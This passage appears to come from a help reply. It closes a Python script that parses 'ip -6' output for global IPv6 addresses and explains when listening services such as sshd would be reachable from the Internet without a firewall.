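    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_IP6_OUTPUT
    for addr, plen, scope, cls in parse_ip6(text):
        print(f"{addr}/{plen:<3} ip says scope={scope:<6} prefix class={cls}")
    print("global IPv6 present:", has_global_ipv6(text))
```

If the only non-loopback line is an fe80:: one, as in the `resolv.conf` and `ss` output posted earlier, there is no global address and nothing outside the LAN can reach the machine over IPv6. If a 2000::/3 address shows up, the listeners that bind `*` or `[::]` (sshd, httpd, gnome-remote-desktop, kdeconnect in the posted output) are reachable from the Internet unless the router's IPv6 firewall or a host firewall drops unsolicited inbound traffic; do not paste that address anywhere.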
